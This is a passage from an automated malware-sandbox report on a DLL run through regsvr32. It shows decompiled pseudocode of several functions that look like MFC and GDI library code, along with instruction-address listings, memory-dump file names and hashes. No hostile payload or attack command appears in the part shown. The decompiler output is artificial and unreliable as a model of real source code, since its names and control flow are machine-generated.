					_v12 = 0x10;
					_t201 = _t201 | E1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}



























                                                                                                                0x100172b0
                                                                                                                0x100172b6
                                                                                                                0x100172bb
                                                                                                                0x100172c3
                                                                                                                0x100172c3
                                                                                                                0x100172c6
                                                                                                                0x00000000
                                                                                                                0x100172ca
                                                                                                                0x100172d0
                                                                                                                0x100172d1
                                                                                                                0x100172d2
                                                                                                                0x100172dc
                                                                                                                0x100172de
                                                                                                                0x100172eb
                                                                                                                0x100172ee
                                                                                                                0x100172f3
                                                                                                                0x100172fc
                                                                                                                0x100172ff
                                                                                                                0x10017304
                                                                                                                0x10017305
                                                                                                                0x10017308
                                                                                                                0x1001730b
                                                                                                                0x10017310
                                                                                                                0x10017311
                                                                                                                0x10017318
                                                                                                                0x1001731f
                                                                                                                0x10017324
                                                                                                                0x10017326
                                                                                                                0x10017328
                                                                                                                0x10017328
                                                                                                                0x10017328
                                                                                                                0x10017326
                                                                                                                0x10017329
                                                                                                                0x1001732d
                                                                                                                0x1001732f
                                                                                                                0x10017339
                                                                                                                0x1001733a
                                                                                                                0x10017341
                                                                                                                0x10017346
                                                                                                                0x10017348
                                                                                                                0x1001734a
                                                                                                                0x1001734a
                                                                                                                0x1001734a
                                                                                                                0x10017348
                                                                                                                0x1001734d
                                                                                                                0x10017351
                                                                                                                0x10017356
                                                                                                                0x10017357
                                                                                                                0x1001735a
                                                                                                                0x10017361
                                                                                                                0x10017368
                                                                                                                0x1001736d
                                                                                                                0x1001736f
                                                                                                                0x10017371
                                                                                                                0x10017371
                                                                                                                0x10017371
                                                                                                                0x1001736f
                                                                                                                0x10017374
                                                                                                                0x10017378
                                                                                                                0x10017388
                                                                                                                0x1001738b
                                                                                                                0x1001738e
                                                                                                                0x10017393
                                                                                                                0x10017395
                                                                                                                0x10017397
                                                                                                                0x10017397
                                                                                                                0x10017397
                                                                                                                0x10017395
                                                                                                                0x1001739a
                                                                                                                0x1001739d
                                                                                                                0x100173ad
                                                                                                                0x100173b4
                                                                                                                0x100173bb
                                                                                                                0x100173c0
                                                                                                                0x100173c2
                                                                                                                0x100173c4
                                                                                                                0x100173c4
                                                                                                                0x100173c4
                                                                                                                0x100173c2
                                                                                                                0x100173c6
                                                                                                                0x100173ca
                                                                                                                0x100173d5
                                                                                                                0x100173e1
                                                                                                                0x100173e3
                                                                                                                0x100173e3
                                                                                                                0x100173e3
                                                                                                                0x100173e3
                                                                                                                0x100173ea
                                                                                                                0x100173ee
                                                                                                                0x100173f6
                                                                                                                0x10017402
                                                                                                                0x10017402
                                                                                                                0x10017402
                                                                                                                0x10017404
                                                                                                                0x10017408
                                                                                                                0x10017413
                                                                                                                0x1001741f
                                                                                                                0x1001741f
                                                                                                                0x1001741f
                                                                                                                0x10017426
                                                                                                                0x10017429
                                                                                                                0x10017430
                                                                                                                0x10017438
                                                                                                                0x10017438
                                                                                                                0x10017438
                                                                                                                0x1001743f
                                                                                                                0x10017442
                                                                                                                0x10017449
                                                                                                                0x10017455
                                                                                                                0x10017455
                                                                                                                0x10017455
                                                                                                                0x1001745c
                                                                                                                0x1001745f
                                                                                                                0x10017466
                                                                                                                0x10017472
                                                                                                                0x10017472
                                                                                                                0x10017472
                                                                                                                0x10017479
                                                                                                                0x1001747c
                                                                                                                0x10017483
                                                                                                                0x1001748f
                                                                                                                0x1001748f
                                                                                                                0x1001748f
                                                                                                                0x10017496
                                                                                                                0x10017499
                                                                                                                0x100174a0
                                                                                                                0x100174ac
                                                                                                                0x100174ac
                                                                                                                0x100174ac
                                                                                                                0x100174b3
                                                                                                                0x100174b6
                                                                                                                0x100174bd
                                                                                                                0x100174c9
                                                                                                                0x100174c9
                                                                                                                0x100174c9
                                                                                                                0x100174d0
                                                                                                                0x100174d3
                                                                                                                0x100174da
                                                                                                                0x100174e2
                                                                                                                0x100174e2
                                                                                                                0x100174e2
                                                                                                                0x100174e9
                                                                                                                0x100174ec
                                                                                                                0x100174f3
                                                                                                                0x100174fb
                                                                                                                0x100174fb
                                                                                                                0x100174fb
                                                                                                                0x10017502
                                                                                                                0x10017505
                                                                                                                0x1001750c
                                                                                                                0x10017518
                                                                                                                0x10017518
                                                                                                                0x10017518
                                                                                                                0x1001751f
                                                                                                                0x10017522
                                                                                                                0x10017529
                                                                                                                0x10017535
                                                                                                                0x10017535
                                                                                                                0x10017535
                                                                                                                0x1001753c
                                                                                                                0x1001753f
                                                                                                                0x10017546
                                                                                                                0x1001754e
                                                                                                                0x1001754e
                                                                                                                0x1001754e
                                                                                                                0x10017550
                                                                                                                0x10017553
                                                                                                                0x10017556
                                                                                                                0x10017562
                                                                                                                0x10017564
                                                                                                                0x10017569
                                                                                                                0x1001756c
                                                                                                                0x1001756c
                                                                                                                0x1001756c
                                                                                                                0x1001757b
                                                                                                                0x1001757d
                                                                                                                0x1001757d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID: @$@$AfxControlBar80s$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                • API String ID: 2102423945-872377046
                                                                                                                • Opcode ID: 246c2736f34b9221e7c0ea197a0b0a73a0b258aac16dd4f6392efafb935adb0d
                                                                                                                • Instruction ID: da3380c3b0667d0e64b503f302b748ed86f8a6d1f09ab35432b847b42ad21fda
                                                                                                                • Opcode Fuzzy Hash: 246c2736f34b9221e7c0ea197a0b0a73a0b258aac16dd4f6392efafb935adb0d
                                                                                                                • Instruction Fuzzy Hash: 34812075C00219AADB40CFA4C585BEEBFF8EF04384F118165F919EA191EB74DB85DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000D1E8 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E1000D1E8(struct HDC__* _a4, struct tagHANDLETABLE* _a8, void* _a12, int _a16, void* _a20) {
				void* _v8;
				void* _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t105;
				void* _t106;
				void* _t108;
				void* _t110;
				void* _t117;
				void* _t118;
				signed int _t119;
				long _t120;
				long _t122;
				long _t124;
				long _t126;
				long _t128;
				void* _t134;
				void* _t136;
				void* _t138;
				void* _t140;
				void* _t144;
				void _t172;
				void* _t173;
				struct tagMETARECORD* _t175;
				void* _t176;

				_t175 = _a12;
				_t119 = _t175->rdFunction & 0x0000ffff;
				_t176 = _t119 - 0x20b;
				if(_t176 > 0) {
					_t120 = _t119 - 0x20c;
					__eflags = _t120;
					if(_t120 == 0) {
						 *((intOrPtr*)( *_a20 + 0x48))( &_v68,  *((short*)(_t175 + 8)), _t175->rdParm);
					} else {
						_t122 = _t120 - 1;
						__eflags = _t122;
						if(_t122 == 0) {
							 *((intOrPtr*)( *_a20 + 0x38))( &_v60,  *((short*)(_t175 + 8)), _t175->rdParm);
						} else {
							_t124 = _t122 - 1;
							__eflags = _t124;
							if(_t124 == 0) {
								 *((intOrPtr*)( *_a20 + 0x40))( &_v52,  *((short*)(_t175 + 8)), _t175->rdParm);
							} else {
								_t126 = _t124 - 3;
								__eflags = _t126;
								if(_t126 == 0) {
									 *((intOrPtr*)( *_a20 + 0x3c))( &_v44,  *((short*)(_t175 + 8)), _t175->rdParm);
								} else {
									_t128 = _t126 - 0x1ff;
									__eflags = _t128;
									if(_t128 == 0) {
										 *((intOrPtr*)( *_a20 + 0x4c))( &_v36,  *((short*)(_t175 + 0xc)),  *((short*)(_t175 + 0xa)),  *((short*)(_t175 + 8)), _t175->rdParm);
									} else {
										__eflags = _t128 == 0;
										if(_t128 == 0) {
											 *((intOrPtr*)( *_a20 + 0x44))( &_v28,  *((short*)(_t175 + 0xc)),  *((short*)(_t175 + 0xa)),  *((short*)(_t175 + 8)), _t175->rdParm);
										} else {
											goto L27;
										}
									}
								}
							}
						}
					}
				} else {
					if(_t176 == 0) {
						E1000C778(_a20,  &_v20,  *((short*)(_t175 + 8)), _t175->rdParm);
					} else {
						_t134 = _t119 - 0x1e;
						if(_t134 == 0) {
							 *((intOrPtr*)( *_a20 + 0x1c))();
						} else {
							_t136 = _t134 - 0xe5;
							if(_t136 == 0) {
								 *((intOrPtr*)( *_a20 + 0x34))(_t175->rdParm);
							} else {
								_t138 = _t136 - 0x24;
								if(_t138 == 0) {
									 *((intOrPtr*)( *_a20 + 0x20))(_t175->rdParm);
								} else {
									_t140 = _t138 - 6;
									if(_t140 == 0) {
										_t141 = _a8;
										_t173 = _a8[_t175->rdParm & 0x0000ffff];
										_a12 = _t173;
										_t105 = GetObjectType(_t173);
										__eflags = _t105;
										if(_t105 != 0) {
											__eflags = _t105 - 6;
											if(__eflags != 0) {
												goto L27;
											} else {
												_push(_t173);
												_t106 = L1000CF95(_t117, _t141, _t173, _t175, __eflags);
												_t172 =  *_a20;
												goto L13;
											}
										} else {
											_t108 = GetStockObject(0xd);
											_t118 = _a20;
											_v8 = _t108;
											_a20 = SelectObject( *(_t118 + 4), _t108);
											_t110 = SelectObject( *(_t118 + 4), _a12);
											__eflags = _t110 - _v8;
											_v12 = _t110;
											if(__eflags != 0) {
												SelectObject( *(_t118 + 4), _a20);
												SelectObject( *(_t118 + 4), _v12);
												goto L27;
											} else {
												_push(_a12);
												_t106 = L1000CF95(_t118, _t141, SelectObject, _t175, __eflags);
												_t172 =  *_t118;
												L13:
												 *((intOrPtr*)(_t172 + 0x28))(_t106);
											}
										}
									} else {
										_t144 = _t140 - 0xd4;
										if(_t144 == 0) {
											 *((intOrPtr*)( *_a20 + 0x2c))(_t175->rdParm);
										} else {
											if(_t144 != 8) {
												L27:
												PlayMetaFileRecord(_a4, _a8, _t175, _a16);
											} else {
												 *((intOrPtr*)( *_a20 + 0x30))(_t175->rdParm);
											}
										}
									}
								}
							}
						}
					}
				}
				return 1;
			}





































                                                                                                                0x1000d1f0
                                                                                                                0x1000d1f3
                                                                                                                0x1000d1fc
                                                                                                                0x1000d1ff
                                                                                                                0x1000d330
                                                                                                                0x1000d330
                                                                                                                0x1000d336
                                                                                                                0x1000d412
                                                                                                                0x1000d33c
                                                                                                                0x1000d33c
                                                                                                                0x1000d33c
                                                                                                                0x1000d33d
                                                                                                                0x1000d3fa
                                                                                                                0x1000d343
                                                                                                                0x1000d343
                                                                                                                0x1000d343
                                                                                                                0x1000d344
                                                                                                                0x1000d3e2
                                                                                                                0x1000d34a
                                                                                                                0x1000d34a
                                                                                                                0x1000d34a
                                                                                                                0x1000d34d
                                                                                                                0x1000d3ca
                                                                                                                0x1000d34f
                                                                                                                0x1000d34f
                                                                                                                0x1000d34f
                                                                                                                0x1000d355
                                                                                                                0x1000d3b2
                                                                                                                0x1000d357
                                                                                                                0x1000d358
                                                                                                                0x1000d359
                                                                                                                0x1000d38d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000d359
                                                                                                                0x1000d355
                                                                                                                0x1000d34d
                                                                                                                0x1000d344
                                                                                                                0x1000d33d
                                                                                                                0x1000d205
                                                                                                                0x1000d205
                                                                                                                0x1000d326
                                                                                                                0x1000d20b
                                                                                                                0x1000d20b
                                                                                                                0x1000d20e
                                                                                                                0x1000d30d
                                                                                                                0x1000d214
                                                                                                                0x1000d214
                                                                                                                0x1000d21a
                                                                                                                0x1000d300
                                                                                                                0x1000d220
                                                                                                                0x1000d220
                                                                                                                0x1000d223
                                                                                                                0x1000d2ee
                                                                                                                0x1000d229
                                                                                                                0x1000d229
                                                                                                                0x1000d22c
                                                                                                                0x1000d263
                                                                                                                0x1000d266
                                                                                                                0x1000d26a
                                                                                                                0x1000d26d
                                                                                                                0x1000d273
                                                                                                                0x1000d275
                                                                                                                0x1000d2ce
                                                                                                                0x1000d2d1
                                                                                                                0x00000000
                                                                                                                0x1000d2d7
                                                                                                                0x1000d2d7
                                                                                                                0x1000d2d8
                                                                                                                0x1000d2e0
                                                                                                                0x00000000
                                                                                                                0x1000d2e0
                                                                                                                0x1000d277
                                                                                                                0x1000d279
                                                                                                                0x1000d27f
                                                                                                                0x1000d28c
                                                                                                                0x1000d294
                                                                                                                0x1000d29a
                                                                                                                0x1000d29c
                                                                                                                0x1000d29f
                                                                                                                0x1000d2a2
                                                                                                                0x1000d2bf
                                                                                                                0x1000d2c7
                                                                                                                0x00000000
                                                                                                                0x1000d2a4
                                                                                                                0x1000d2a4
                                                                                                                0x1000d2a7
                                                                                                                0x1000d2ac
                                                                                                                0x1000d2b0
                                                                                                                0x1000d2b1
                                                                                                                0x1000d2b1
                                                                                                                0x1000d2a2
                                                                                                                0x1000d22e
                                                                                                                0x1000d22e
                                                                                                                0x1000d234
                                                                                                                0x1000d257
                                                                                                                0x1000d236
                                                                                                                0x1000d239
                                                                                                                0x1000d35b
                                                                                                                0x1000d365
                                                                                                                0x1000d23f
                                                                                                                0x1000d247
                                                                                                                0x1000d247
                                                                                                                0x1000d239
                                                                                                                0x1000d234
                                                                                                                0x1000d22c
                                                                                                                0x1000d223
                                                                                                                0x1000d21a
                                                                                                                0x1000d20e
                                                                                                                0x1000d205
                                                                                                                0x1000d41c

                                                                                                                APIs
                                                                                                                • GetObjectType.GDI32 ref: 1000D26D
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 1000D279
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1000D28F
                                                                                                                • SelectObject.GDI32(?,?), ref: 1000D29A
                                                                                                                • PlayMetaFileRecord.GDI32(?,?,?,?), ref: 1000D365
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$FileMetaPlayRecordStockType
                                                                                                                • String ID:
                                                                                                                • API String ID: 4008327421-0
                                                                                                                • Opcode ID: f562a23c37564a38b1fc0ebd0acd21fa1261cdd2b465d0324882b9d721ffca98
                                                                                                                • Instruction ID: a374fe531f4533bf9e2ac478e20ab67a5c21d16fab6e8d4b8b067a8713c70d93
                                                                                                                • Opcode Fuzzy Hash: f562a23c37564a38b1fc0ebd0acd21fa1261cdd2b465d0324882b9d721ffca98
                                                                                                                • Instruction Fuzzy Hash: 34714A79504A15DBDB14EFA4C884CBFBBF5FF88781B10845EF9124A628D734E980DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003FC56 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1003FC56(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				struct tagRECT _v20;
				struct tagRECT _v36;
				struct HWND__* _v84;
				unsigned int _v108;
				intOrPtr _v112;
				char _v116;
				void* __edi;
				void* __esi;
				intOrPtr _t51;
				intOrPtr* _t53;
				intOrPtr* _t69;
				signed int _t72;
				void* _t74;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t95;
				void* _t100;
				intOrPtr* _t102;

				_push(0);
				_t102 = __ecx;
				_push(0);
				_push(0x40c);
				_t74 =  *((intOrPtr*)( *__ecx + 0x110))();
				_t104 = _t74;
				_v116 = 0x50;
				_t100 = _t74;
				if(_t74 == 0) {
					L7:
					SetRectEmpty( &_v20);
					while(_t74 != 0) {
						_t74 = _t74 - 1;
						_v112 = 1;
						 *((intOrPtr*)( *_t102 + 0x110))(0x41d, _t74,  &_v116);
						__eflags = _v108 & 0x00000008;
						if((_v108 & 0x00000008) == 0) {
							 *((intOrPtr*)( *_t102 + 0x110))(0x409, _t74,  &_v36);
							UnionRect( &_v20,  &_v20,  &_v36);
						}
					}
					if(IsRectEmpty( &_v20) != 0) {
						_t51 = _v20.bottom;
						_t78 = _v20.right;
					} else {
						SetRectEmpty( &_v36);
						 *((intOrPtr*)( *_t102 + 0x140))( &_v36, _a12);
						_t78 = _v20.right + _v36.left - _v36.right;
						_t51 = _v20.bottom + _v36.top - _v36.bottom;
					}
					if(_a12 != 0 || _a8 == 0) {
						__eflags = _a12;
						_t95 = _t51 - _v20.top;
						if(_a12 == 0) {
							goto L17;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L17;
						}
						_t79 = 0x7fff;
						goto L18;
					} else {
						_t95 = 0x7fff;
						L17:
						_t79 = _t78 - _v20.left;
						L18:
						_t53 = _a4;
						 *_t53 = _t79;
						 *((intOrPtr*)(_t53 + 4)) = _t95;
						return _t53;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					_t100 = _t100 - 1;
					_v112 = 0x11;
					 *((intOrPtr*)( *_t102 + 0x110))(0x41d, _t100,  &_v116);
					_t69 = E100203C2(0x1009e47c, E10014011(_t102, _t100, _t102, _t104, _v84));
					if(_t69 == 0) {
						_t72 = GetWindowLongA(_v84, 0xfffffff0) >> 0x0000001c & 0x00000001;
						__eflags = _t72;
					} else {
						_t72 =  *((intOrPtr*)( *_t69 + 0x154))();
					}
					if(_t72 != ( !(_v108 >> 3) & 0x00000001)) {
						 *((intOrPtr*)( *_t102 + 0x110))(0x423, _t100, _t72);
					}
				} while (_t100 != 0);
				goto L7;
			}





















                                                                                                                0x1003fc5f
                                                                                                                0x1003fc61
                                                                                                                0x1003fc65
                                                                                                                0x1003fc67
                                                                                                                0x1003fc72
                                                                                                                0x1003fc74
                                                                                                                0x1003fc76
                                                                                                                0x1003fc7d
                                                                                                                0x1003fc7f
                                                                                                                0x1003fcf7
                                                                                                                0x1003fd01
                                                                                                                0x1003fd4a
                                                                                                                0x1003fd0b
                                                                                                                0x1003fd14
                                                                                                                0x1003fd1b
                                                                                                                0x1003fd21
                                                                                                                0x1003fd25
                                                                                                                0x1003fd35
                                                                                                                0x1003fd44
                                                                                                                0x1003fd44
                                                                                                                0x1003fd25
                                                                                                                0x1003fd5a
                                                                                                                0x1003fd8b
                                                                                                                0x1003fd8e
                                                                                                                0x1003fd5c
                                                                                                                0x1003fd60
                                                                                                                0x1003fd6d
                                                                                                                0x1003fd82
                                                                                                                0x1003fd87
                                                                                                                0x1003fd87
                                                                                                                0x1003fd96
                                                                                                                0x1003fdb7
                                                                                                                0x1003fdba
                                                                                                                0x1003fdbc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003fdbe
                                                                                                                0x1003fdc1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003fdc3
                                                                                                                0x00000000
                                                                                                                0x1003fd9d
                                                                                                                0x1003fd9d
                                                                                                                0x1003fda2
                                                                                                                0x1003fda2
                                                                                                                0x1003fda5
                                                                                                                0x1003fda5
                                                                                                                0x1003fdaa
                                                                                                                0x1003fdac
                                                                                                                0x1003fdb1
                                                                                                                0x1003fdb1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003fc81
                                                                                                                0x1003fc81
                                                                                                                0x1003fc87
                                                                                                                0x1003fc90
                                                                                                                0x1003fc97
                                                                                                                0x1003fcab
                                                                                                                0x1003fcb4
                                                                                                                0x1003fcd0
                                                                                                                0x1003fcd0
                                                                                                                0x1003fcb6
                                                                                                                0x1003fcba
                                                                                                                0x1003fcba
                                                                                                                0x1003fce0
                                                                                                                0x1003fced
                                                                                                                0x1003fced
                                                                                                                0x1003fcf3
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Empty$LongUnionWindow
                                                                                                                • String ID: P
                                                                                                                • API String ID: 1811082079-3110715001
                                                                                                                • Opcode ID: 6b72cd354d9265c7ba935c05ee196e7bacef4bb1858a8396bb49631afc64948d
                                                                                                                • Instruction ID: d1836f5a0f382b97b9cbd91a64c48767d3f03db10e2d9acb5cf6244ea132254a
                                                                                                                • Opcode Fuzzy Hash: 6b72cd354d9265c7ba935c05ee196e7bacef4bb1858a8396bb49631afc64948d
                                                                                                                • Instruction Fuzzy Hash: 3E415971A0021AAFDB15CFA5C888EFEB7B9FF48705F15452DE955AB280CB749940CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003275C Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E1003275C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t103;
				intOrPtr _t120;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = __edx;
				_push(0x6c);
				E1004764D(0x10090905, __ebx, __edi, __esi);
				_t122 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t123 - 0x14) = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L18:
					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
					return E10047725(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t108 =  *(_t123 - 0x10) * 0x28;
					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
					if(_t76 == 0) {
						goto L17;
					}
					_t78 =  *((intOrPtr*)(_t76 + 4));
					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
					if(_t78 == 0) {
						goto L17;
					}
					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
					do {
						_t120 =  *((intOrPtr*)(E10012115(_t123 - 0x20)));
						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
						E10049170(_t120, _t123 - 0x78, 0, 0x20);
						_t124 = _t124 + 0xc;
						E100235FF(_t123 - 0x48);
						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
						_t130 =  *((intOrPtr*)(_t122 + 0x48));
						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
							__eflags = _t89;
						} else {
							_t103 = E10032245(_t108, _t122, _t116, _t120, _t122, _t130);
							 *(_t123 - 4) = 1;
							E100235DF(_t103, _t123 - 0x48, _t103);
							 *(_t123 - 4) = 0;
							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
							_t89 = _t123 - 0x48;
						}
